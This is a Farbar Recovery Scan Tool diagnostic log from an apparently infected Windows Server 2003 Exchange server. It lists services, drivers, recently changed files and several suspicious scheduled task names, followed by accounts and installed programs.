R2 SamSs; C:\WINDOWS\system32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
S3 SCardSvr; C:\WINDOWS\System32\SCardSvr.exe [166400 2007-02-18] (Microsoft Corporation)
S3 SCardSvr; C:\WINDOWS\SysWOW64\SCardSvr.exe [90112 2007-02-18] (Microsoft Corporation)
R2 Schedule; C:\WINDOWS\SysWOW64\schedsvc.dll [202240 2007-02-18] (Microsoft Corporation)
R2 seclogon; C:\WINDOWS\SysWOW64\seclogon.dll [18432 2007-02-18] (Microsoft Corporation)
R2 Server Administrator; C:\Program Files (x86)\Dell\SysMgt\iws\bin\win32\dsm_om_connsvc32.exe [55208 2009-10-22] ()
R2 SNMP; C:\WINDOWS\System32\snmp.exe [60928 2007-02-18] (Microsoft Corporation)
R2 SNMP; C:\WINDOWS\SysWOW64\snmp.exe [40960 2007-02-18] (Microsoft Corporation)
S3 SNMPTRAP; C:\WINDOWS\System32\snmptrap.exe [11264 2007-02-18] (Microsoft Corporation)
R2 Spooler; C:\WINDOWS\system32\spoolsv.exe [111616 2010-08-18] (Microsoft Corporation)
S4 stisvc; C:\WINDOWS\SysWOW64\wiaservc.dll [348160 2007-02-18] (Microsoft Corporation)
S2 SysmonLog; C:\WINDOWS\system32\smlogsvc.exe [133120 2007-02-18] (Microsoft Corporation)
S2 SysmonLog; C:\WINDOWS\SysWOW64\smlogsvc.exe [96256 2007-02-18] (Microsoft Corporation)
S4 TlntSvr; C:\WINDOWS\system32\tlntsvr.exe [113152 2007-02-18] (Microsoft Corporation)
S4 TrkSvr; C:\WINDOWS\system32\trksvr.dll [86528 2007-02-18] (Microsoft Corporation)
S4 TrkSvr; C:\WINDOWS\SysWOW64\trksvr.dll [50688 2007-02-18] (Microsoft Corporation)
R2 TrkWks; C:\WINDOWS\SysWOW64\trkwks.dll [86528 2007-02-18] (Microsoft Corporation)
S4 Tssdis; C:\WINDOWS\System32\tssdis.exe [99840 2007-02-18] (Microsoft Corporation)
S3 UMWdf; C:\WINDOWS\system32\wdfmgr.exe [62976 2007-02-18] (Microsoft Corporation)
S3 UMWdf; C:\WINDOWS\SysWOW64\wdfmgr.exe [39424 2007-02-18] (Microsoft Corporation)
S3 UPS; C:\WINDOWS\System32\ups.exe [34816 2007-02-18] (Microsoft Corporation)
S3 UPS; C:\WINDOWS\SysWOW64\ups.exe [16896 2007-02-18] (Microsoft Corporation)
S3 vds; C:\WINDOWS\System32\vds.exe [613376 2007-02-18] (Microsoft Corporation)
S3 VSS; C:\WINDOWS\System32\vssvc.exe [2062336 2007-02-18] (Microsoft Corporation)
R2 W32Time; C:\WINDOWS\SysWOW64\w32time.dll [227328 2007-02-18] (Microsoft Corporation)
S3 WmdmPmSN; C:\WINDOWS\SysWOW64\mspmsnsv.dll [25088 2007-02-18] (Microsoft Corporation)
S3 Wmi; C:\WINDOWS\System32\advapi32.dll [1066496 2015-06-27] (Microsoft Corporation)
S3 Wmi; C:\WINDOWS\SysWOW64\advapi32.dll [620032 2015-06-27] (Microsoft Corporation)
R2 wuauserv; C:\WINDOWS\system32\wuauserv.dll [12288 2007-02-18] (Microsoft Corporation)
R2 WZCSVC; C:\WINDOWS\System32\wzcsvc.dll [659968 2007-02-18] (Microsoft Corporation)
R2 WZCSVC; C:\WINDOWS\SysWOW64\wzcsvc.dll [489472 2007-02-18] (Microsoft Corporation)
S3 xmlprov; C:\WINDOWS\System32\xmlprov.dll [326144 2007-02-18] (Microsoft Corporation)
S3 xmlprov; C:\WINDOWS\SysWOW64\xmlprov.dll [131584 2007-02-18] (Microsoft Corporation)
S4 HidServ; %SystemRoot%\System32\hidserv.dll [X]
R2 ScanMail_Master; "C:\Program Files\Trend Micro\Smex\svcGenericHost.exe" SMEX_Master.exe .\config\cfg_ipcServerDll1.txt SMEX_HOST [X]
R2 ScanMail_RemoteConfig; "C:\Program Files\Trend Micro\Smex\svcGenericHost.exe" SMEX_RemoteConfig.exe .\config\cfg_ipcServerDll2.txt SMEX_CFG_HOST [X]
R2 ScanMail_SystemWatcher; "C:\Program Files\Trend Micro\Smex\svcGenericHost.exe" SMEX_SystemWatcher.exe .\config\cfg_SystemWatcherManager.txt SMEX_SW [X]
S3 WinHttpAutoProxySvc; winhttp.dll [X]
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S4 Abiosdsk; no ImagePath
S4 ACPIEC; C:\Windows\System32\Drivers\ACPIEC.sys [18432 2007-02-18] (Microsoft Corporation)
S4 adpu160m; no ImagePath
S4 adpu320; no ImagePath
S4 aic78u2; no ImagePath
S4 aic78xx; no ImagePath
S4 AliIde; no ImagePath
S4 AmdIde; no ImagePath
S4 arc; no ImagePath
S4 Atdisk; no ImagePath
R3 ati2mtag; C:\WINDOWS\System32\DRIVERS\ati2mtag.sys [2210304 2007-10-17] (ATI Technologies Inc.)
S3 Atmarpc; C:\WINDOWS\System32\DRIVERS\atmarpc.sys [106496 2007-02-18] (Microsoft Corporation)
R3 audstub; C:\WINDOWS\System32\DRIVERS\audstub.sys [5632 2005-03-24] (Microsoft Corporation)
R2 CdaC15BA; C:\WINDOWS\System32\DRIVERS\CdaC15BA.sys [13312 2007-02-18] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.)
R2 CdaD10BA; C:\WINDOWS\System32\DRIVERS\CdaD10BA.sys [13312 2007-02-18] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.)
S1 Changer; no ImagePath
S4 ClusDisk; C:\WINDOWS\System32\DRIVERS\ClusDisk.sys [112640 2007-02-18] (Microsoft Corporation)
S4 CmdIde; no ImagePath
S4 cpqcissm; no ImagePath
R3 dcdbas; C:\WINDOWS\System32\DRIVERS\dcdbas64.sys [31744 2009-06-12] (Dell Inc.)
R0 DfsDriver; C:\WINDOWS\System32\drivers\Dfs.sys [52736 2007-02-18] (Microsoft Corporation)
S4 dmboot; C:\WINDOWS\System32\drivers\dmboot.sys [415232 2007-02-18] (Microsoft Corporation)
R0 dmio; C:\WINDOWS\System32\drivers\dmio.sys [244224 2007-02-18] (Microsoft Corporation)
R0 dmload; C:\WINDOWS\System32\drivers\dmload.sys [9216 2007-02-18] (Microsoft Corporation)
S4 dpti2o; no ImagePath
R3 e1express; C:\WINDOWS\System32\DRIVERS\e1e5132e.sys [328336 2008-02-07] (Intel Corporation)
S4 elxstor; no ImagePath
R1 Fips; C:\Windows\System32\Drivers\Fips.sys [50176 2007-02-18] (Microsoft Corporation)
R0 Ftdisk; C:\WINDOWS\System32\DRIVERS\ftdisk.sys [240128 2007-02-18] (Microsoft Corporation)
R3 Gpc; C:\WINDOWS\System32\DRIVERS\msgpc.sys [71168 2007-02-18] (Microsoft Corporation)
S4 hpcisss; no ImagePath
S1 i2omgmt; no ImagePath
S4 iirsp; no ImagePath
R1 imapi; C:\WINDOWS\System32\DRIVERS\imapi.sys [72704 2007-02-18] (Microsoft Corporation)
S4 IntelIde; no ImagePath
S3 Ip6Fw; C:\WINDOWS\System32\DRIVERS\Ip6Fw.sys [57856 2007-02-18] (Microsoft Corporation)
R1 IPSec; C:\WINDOWS\System32\DRIVERS\ipsec.sys [156672 2007-02-18] (Microsoft Corporation)
S3 l2nd; C:\WINDOWS\System32\DRIVERS\bxnd52a.sys [64512 2007-10-17] (Broadcom Corporation)
U3 LicenseInfo; no ImagePath
S4 lp6nds35; no ImagePath
R1 mnmdd; C:\Windows\System32\Drivers\mnmdd.sys [8192 2007-02-18] (Microsoft Corporation)
R0 mpdev; C:\WINDOWS\System32\DRIVERS\mpdev.sys [21368 2007-11-22] (Microsoft Corporation)
R0 MpFilter; C:\WINDOWS\System32\DRIVERS\MpFilter.sys [247216 2013-09-10] (Microsoft Corporation)
R1 MpKsl8fadf9b0; C:\WINDOWS\Temp\MpKsl8fadf9b0.sys [44928 2017-09-11] (Microsoft Corporation)
R0 mpspfltr; C:\WINDOWS\System32\DRIVERS\mpspfltr.sys [26168 2008-11-13] (Microsoft Corporation)
S4 mraid35x; no ImagePath
R0 msiscdsm; C:\WINDOWS\System32\DRIVERS\msiscdsm.sys [52280 2008-11-13] (Microsoft Corporation)
S4 nfrd960; no ImagePath
S3 PDCOMP; no ImagePath
S3 PDFRAME; no ImagePath
S3 PDRELI; no ImagePath
S3 PDRFRAME; no ImagePath
R1 PDVFSDriver; C:\WINDOWS\System32\drivers\pdfsd.sys [81496 2013-01-14] (Symantec Corporation)
S4 PDVFSNP; no ImagePath
R0 percsas; C:\WINDOWS\System32\drivers\percsas.sys [27136 2009-01-19] (LSI Corporation)
R3 Ptilink; C:\WINDOWS\System32\DRIVERS\ptilink.sys [31232 2007-02-18] (Parallel Technologies, Inc.)
S4 ql2300; no ImagePath
R3 Raspti; C:\WINDOWS\System32\DRIVERS\raspti.sys [31232 2007-02-18] (Microsoft Corporation)
R1 redbook; C:\WINDOWS\System32\DRIVERS\redbook.sys [64000 2005-03-24] (Microsoft Corporation)
U5 sacdrv; C:\Windows\System32\Drivers\sacdrv.sys [130560 2007-02-18] (Microsoft Corporation)
U5 ScsiPort; C:\WINDOWS\system32\drivers\scsiport.sys [171008 2007-02-18] (Microsoft Corporation)
S4 Simbad; no ImagePath
S4 symc8xx; no ImagePath
S4 symmpi; no ImagePath
S4 sym_hi; no ImagePath
S4 sym_u3; no ImagePath
S4 TosIde; no ImagePath
S4 ultra; no ImagePath
R3 Update; C:\WINDOWS\System32\DRIVERS\update.sys [152576 2007-05-30] (Microsoft Corporation)
S4 ViaIde; no ImagePath
R3 VirtFile; C:\WINDOWS\System32\DRIVERS\VirtFile.sys [115440 2013-01-04] (Symantec Corporation)
S3 WDICA; no ImagePath
S3 WLBS; C:\WINDOWS\System32\DRIVERS\wlbs.sys [280576 2007-02-18] (Microsoft Corporation)
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S4 vsdatant; a [X]
U1 WS2IFSL; no ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
NETSVC: Sacsvr -> C:\Windows\system32\sacsvr.dll (Microsoft Corporation)
NETSVC: TrkSvr -> C:\Windows\system32\trksvr.dll (Microsoft Corporation)
NETSVCx32: Browser -> C:\Windows\SysWOW64\browser.dll (Microsoft Corporation)
NETSVCx32: CryptSvc -> C:\Windows\SysWOW64\cryptsvc.dll (Microsoft Corporation)
NETSVCx32: DMServer -> C:\Windows\SysWOW64\dmserver.dll ==> No File
NETSVCx32: EventSystem -> C:\WINDOWS\SysWOW64\es.dll (Microsoft Corporation)
NETSVCx32: HidServ -> C:\Windows\SysWOW64\hidserv.dll ==> No File
NETSVCx32: Iprip -> no filepath.
NETSVCx32: LanmanWorkstation -> C:\Windows\SysWOW64\wkssvc.dll ==> No File
NETSVCx32: Messenger -> C:\Windows\SysWOW64\msgsvc.dll ==> No File
NETSVCx32: Netman -> C:\Windows\SysWOW64\netman.dll (Microsoft Corporation)
NETSVCx32: Sacsvr -> C:\Windows\SysWOW64\sacsvr.dll ==> No File
NETSVCx32: Seclogon -> C:\Windows\SysWOW64\seclogon.dll (Microsoft Corporation)
NETSVCx32: TrkWks -> C:\Windows\SysWOW64\trkwks.dll (Microsoft Corporation)
NETSVCx32: TrkSvr -> C:\Windows\SysWOW64\trksvr.dll (Microsoft Corporation)
NETSVCx32: WZCSVC -> C:\Windows\SysWOW64\wzcsvc.dll (Microsoft Corporation)
NETSVCx32: xmlprov -> C:\Windows\SysWOW64\xmlprov.dll (Microsoft Corporation)
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-09-11 11:19 - 2017-09-11 11:19 - 000000000 ____D C:\FRST
2017-09-11 11:07 - 2017-09-11 11:07 - 024968960 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\eventlog-Security-20170911.evt
2017-09-11 11:07 - 2017-09-11 11:07 - 016777200 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\eventlog-System-20170911.evt
2017-09-11 11:06 - 2017-09-11 11:07 - 041547200 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\eventlog-Application-20170911.evt
2017-09-11 10:29 - 2017-09-11 10:29 - 000000000 ____D C:\WINDOWS\pss
2017-09-08 19:55 - 2017-09-11 01:50 - 000000384 ____H C:\WINDOWS\Tasks\Microsoft Antimalware Scheduled Scan.job
2017-09-08 19:50 - 2017-09-11 11:19 - 000000000 ____D C:\Documents and Settings\administrator.CENTRECITY\Local Settings\Temp\1
2017-09-08 19:40 - 2017-09-08 19:40 - 000001945 _____ C:\WINDOWS\epplauncher.mif
2017-09-08 19:33 - 2017-09-08 19:33 - 000001730 _____ C:\Documents and Settings\All Users\Start Menu\Programs\System Center Endpoint Protection.lnk
2017-09-08 19:33 - 2017-09-08 19:33 - 000000000 ____D C:\Program Files\Microsoft Security Client
2017-09-08 19:33 - 2017-09-08 19:33 - 000000000 ____D C:\Program Files (x86)\Microsoft Security Client
2017-09-08 19:08 - 2017-09-08 19:08 - 000009308 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\20170908 - Rogue Killer malware report.txt
2017-09-08 19:07 - 2017-09-08 19:07 - 000009310 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\20170908 - malware report.txt
2017-09-08 18:25 - 2017-09-08 19:32 - 000000000 ____D C:\Documents and Settings\All Users\Application Data\RogueKiller
2017-09-08 18:25 - 2017-09-08 19:21 - 000028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2017-09-08 18:25 - 2017-09-08 18:25 - 000000000 ____D C:\Documents and Settings\All Users\Start Menu\Programs\RogueKiller
2017-09-08 18:24 - 2017-09-08 18:25 - 000000000 ____D C:\Program Files\RogueKiller
2017-09-08 18:13 - 2017-09-08 18:13 - 138427338 _____ C:\regedit-201709081813-prelsmoseremoval.reg
2017-09-08 18:00 - 2017-09-08 18:00 - 000060678 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\20170908 - changelog.-removed expired certs.txt
2017-09-08 17:45 - 2017-09-08 17:45 - 000014434 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\20170908 - changelog.txt
2017-08-25 10:04 - 2017-08-25 10:04 - 041549496 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\eventlog-Application-201708251004.evt
2017-08-25 10:04 - 2017-08-25 10:04 - 024968936 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\eventlog-Security-201708251004.evt
2017-08-25 10:04 - 2017-08-25 10:04 - 016776656 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\eventlog-System-201708251004.evt
2017-08-23 18:07 - 2017-08-23 18:07 - 000020698 _____ C:\Documents and Settings\administrator.CENTRECITY\Desktop\Get-MailboxDatabase-20170823.txt
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-09-11 09:52 - 2007-12-14 21:16 - 000000136 _____ C:\WINDOWS\system32\config\netlogon.ftl
2017-09-11 06:16 - 2011-10-07 14:47 - 000000278 _____ C:\WINDOWS\Tasks\defrag X.job
2017-09-11 06:16 - 2010-05-21 06:00 - 000000178 ___SH C:\Documents and Settings\desktop\ntuser.ini
2017-09-11 06:13 - 2010-05-20 15:14 - 000000278 _____ C:\WINDOWS\Tasks\defrag.job
2017-09-11 06:03 - 2008-02-21 18:31 - 000000968 _____ C:\WINDOWS\Tasks\systemstate.job
2017-09-11 06:03 - 2007-12-12 18:12 - 000000000 ____D C:\WINDOWS\system32\NtmsData
2017-09-11 06:00 - 2007-12-10 10:57 - 000000000 ____D C:\WINDOWS\system32\inetsrv
2017-09-11 06:00 - 2007-12-10 10:57 - 000000000 ____D C:\WINDOWS\repair
2017-09-11 05:32 - 2007-12-10 10:57 - 000000000 ____D C:\WINDOWS\Help
2017-09-11 02:15 - 2008-04-10 23:55 - 000000000 ___HD C:\Backup Exec AOFO Store
2017-09-11 01:06 - 2007-12-10 19:28 - 000000000 __SHD C:\Documents and Settings\NetworkService
2017-09-11 01:06 - 2007-12-10 19:28 - 000000000 __SHD C:\Documents and Settings\LocalService
2017-09-11 01:02 - 2007-12-14 21:23 - 000000000 ____D C:\Documents and Settings\administrator.CENTRECITY
2017-09-10 18:32 - 2007-12-10 10:57 - 000000000 ____D C:\WINDOWS\security
2017-09-08 19:54 - 2011-07-25 10:45 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-09-08 19:53 - 2014-01-07 12:21 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-09-08 19:50 - 2007-12-10 11:03 - 001735618 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-09-08 19:45 - 2007-12-10 19:28 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-09-08 19:45 - 2007-12-10 09:50 - 000002206 _____ C:\WINDOWS\system32\wpa.dbl
2017-09-08 19:41 - 2011-09-29 18:29 - 015728640 _____ C:\WINDOWS\system32\config\MOMLog.evt
2017-09-08 19:41 - 2010-04-16 20:13 - 000315601 _____ C:\WINDOWS\TTY_00000000.log.1
2017-09-08 19:41 - 2007-12-14 23:53 - 012517376 _____ C:\WINDOWS\system32\config\PowerShell.evt
2017-09-08 19:41 - 2007-12-14 21:23 - 000000178 ___SH C:\Documents and Settings\administrator.CENTRECITY\ntuser.ini
2017-09-08 19:41 - 2007-12-10 19:28 - 000032548 _____ C:\WINDOWS\Tasks\SchedLgU.Txt
2017-09-08 19:33 - 2007-12-10 10:57 - 000000000 ____D C:\WINDOWS\inf
2017-09-08 18:35 - 2017-06-23 05:32 - 000000330 _____ C:\WINDOWS\Tasks\ok.job
2017-09-08 18:35 - 2017-06-08 17:32 - 000000414 _____ C:\WINDOWS\Tasks\Mysa2.job
2017-09-08 18:34 - 2017-06-08 17:31 - 000000410 _____ C:\WINDOWS\Tasks\Mysa.job
2017-09-08 18:34 - 2017-06-08 17:31 - 000000334 _____ C:\WINDOWS\Tasks\Mysa1.job
2017-09-08 18:28 - 2008-10-11 20:47 - 000000000 ____D C:\Program Files\EqualLogic
 
==================== Files in the root of some directories =======
 
2007-12-14 23:32 - 2007-12-14 23:32 - 011519569 _____ () C:\Program Files\Microsoft.zip
2009-10-06 00:14 - 2009-10-06 00:14 - 000000036 _____ () C:\Documents and Settings\administrator.CENTRECITY\Local Settings\Application Data\housecall.guid.cache
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe IS MISSING <==== ATTENTION
C:\WINDOWS\SysWOW64\wininit.exe IS MISSING <==== ATTENTION
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
C:\WINDOWS\system32\codeintegrity\Bootcat.cache IS MISSING <==== ATTENTION
 
 
ATTENTION: ==> Could not access BCD. 
 
==================== End of FRST.txt ============================
#################Addition LOG below##########

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 11-09-2017
Ran by administrator (11-09-2017 11:20:09)
Running from \\MYSERVER-arch-01\Install\Apps\antivirus
Microsoft Windows Server 2003 R2 Service Pack 2 (X64) (2007-12-11 02:26:28)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1361566594-692788083-1720729673-500 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\Administrator
Guest (S-1-5-21-1361566594-692788083-1720729673-501 - Limited - Disabled)
IUSR_MYSERVER-EXCH-01 (S-1-5-21-1361566594-692788083-1720729673-1004 - Limited - Enabled)
IWAM_MYSERVER-EXCH-01 (S-1-5-21-1361566594-692788083-1720729673-1005 - Limited - Enabled)
SUPPORT_388945a0 (S-1-5-21-1361566594-692788083-1720729673-1001 - Limited - Disabled)
sysadmin (S-1-5-21-1361566594-692788083-1720729673-1003 - Administrator - Enabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Active Directory Management Pack Helper Object (HKLM\...\{3696BAB3-3B1B-42C3-8D46-1898E59E7C84}) (Version: 1.1.0 - Microsoft Corporation)
Adobe Flash Player 19 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 19.0.0.185 - Adobe Systems Incorporated)
ATI Display Driver (HKLM\...\ATI Display Driver) (Version: 8.24.3-060405a-041210C-Dell - )
Dell OpenManage Server Administrator (HKLM-x32\...\{54C04D53-C3C3-46EA-A75F-7AFF4BEB727C}) (Version: 6.2.0 - Dell)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version:  - )
Java 8 Update 91 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218091F0}) (Version: 8.0.910.14 - Oracle Corporation)
Java™ 6 Update 7 (HKLM-x32\...\{3248F0A8-6813-11D6-A77B-00B0D0160070}) (Version: 1.6.0.70 - Sun Microsystems, Inc.)
LiveUpdate 3.3 (Symantec Corporation) (HKLM-x32\...\LiveUpdate) (Version: 3.3.0.71 - Symantec Corporation)
Messaging API and Collaboration Data Objects 1.2.1 (HKLM-x32\...\{5A8751A2-684E-4D42-846C-3A58CE36C1F9}) (Version: 6.5.7974.0 - Microsoft)
Microsoft .NET Framework 2.0 Service Pack 2 (HKLM\...\{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}) (Version: 2.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.0 Service Pack 2 (HKLM\...\{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}) (Version: 3.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft Exchange Server 2007 (HKLM\...\Microsoft Exchange) (Version: 8.2.176.2 - Microsoft Corporation)
Microsoft Exchange User Monitor (HKLM-x32\...\{75189587-0D84-4404-8F02-79C39728FA64}) (Version: 14.0.611.0 - Microsoft Corporation)
Microsoft Full Text Indexing Engine for Exchange (HKLM\...\{6574FDC2-40FC-405A-9554-22D1CE15686B}) (Version: 8.2.176.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM-x32\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server Native Client (HKLM\...\{9ACF3FDB-C8E6-444C-8C64-13A221F7BFFD}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM-x32\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{B636C9B9-A3F2-4DCE-ADCC-72E095018385}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Mozilla Firefox 47.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 47.0.2 (x86 en-US)) (Version: 47.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 47.0.2.6148 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 6 Service Pack 2 (KB2957482) (HKLM\...\{A4F464A5-9DAC-44B6-A78C-E25C5BB97B25}) (Version: 6.20.2017.0 - Microsoft Corporation)
RogueKiller version 12.11.13.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 12.11.13.0 - Adlice Software)
Symantec Backup Exec Remote Agent for Windows Systems (HKLM\...\{2E214FDB-1B99-4BF3-BEE4-43B82EB1D6AE}) (Version: 13.0.5204 - Symantec Corporation) Hidden
Symantec Backup Exec Remote Agent for Windows Systems (HKLM\...\Remote Agent for Windows Servers) (Version: 13.0.5204 - Symantec Corporation)
System Center Endpoint Protection (HKLM\...\Microsoft Security Client) (Version: 4.3.220.0 - Microsoft Corporation)
System Center Operations Manager 2007 Agent (HKLM\...\{E7600A9C-6782-4221-984E-AB89C780DC2D}) (Version: 6.0.6278.0 - Microsoft Corporation)
Trend Micro ScanMail for Microsoft Exchange (HKLM\...\{E5B262F1-1EA7-4DEF-978D-7B3353941D85}) (Version: 10.2.1135 - Trend Micro Incorporated) Hidden
Trend Micro ScanMail for Microsoft Exchange (HKLM\...\SMEX_{E5B262F1-1EA7-4DEF-978D-7B3353941D85}) (Version: 10.2.1135 - Trend Micro Incorporated)
Update for Windows Server 2003 (KB2141007) (HKLM\...\KB2141007) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2345886) (HKLM\...\KB2345886) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2467659) (HKLM\...\KB2467659) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2607712) (HKLM\...\KB2607712) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2616676-v2) (HKLM\...\KB2616676-v2) (Version: 2 - Microsoft Corporation)
Update for Windows Server 2003 (KB2641690-v2) (HKLM\...\KB2641690-v2) (Version: 2 - Microsoft Corporation)
Update for Windows Server 2003 (KB2661254) (HKLM\...\KB2661254) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2748349) (HKLM\...\KB2748349) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2749655) (HKLM\...\KB2749655) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2863058) (HKLM\...\KB2863058) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2904266) (HKLM\...\KB2904266) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2981580) (HKLM\...\KB2981580) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB2993651) (HKLM\...\KB2993651) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB3065979) (HKLM\...\KB3065979) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB927891) (HKLM\...\KB927891) (Version: 5 - Microsoft Corporation)
Update for Windows Server 2003 (KB932596) (HKLM\...\KB932596) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB933360) (HKLM\...\KB933360) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB936357) (HKLM\...\KB936357) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB942763) (HKLM\...\KB942763) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB942840) (HKLM\...\KB942840) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB948496) (HKLM\...\KB948496) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB951072-v2) (HKLM\...\KB951072-v2) (Version: 2 - Microsoft Corporation)
Update for Windows Server 2003 (KB955759) (HKLM\...\KB955759) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB955839) (HKLM\...\KB955839) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB967715) (HKLM\...\KB967715) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB968389) (HKLM\...\KB968389) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB971029) (HKLM\...\KB971029) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB971737) (HKLM\...\KB971737) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB973687) (HKLM\...\KB973687) (Version: 1 - Microsoft Corporation)
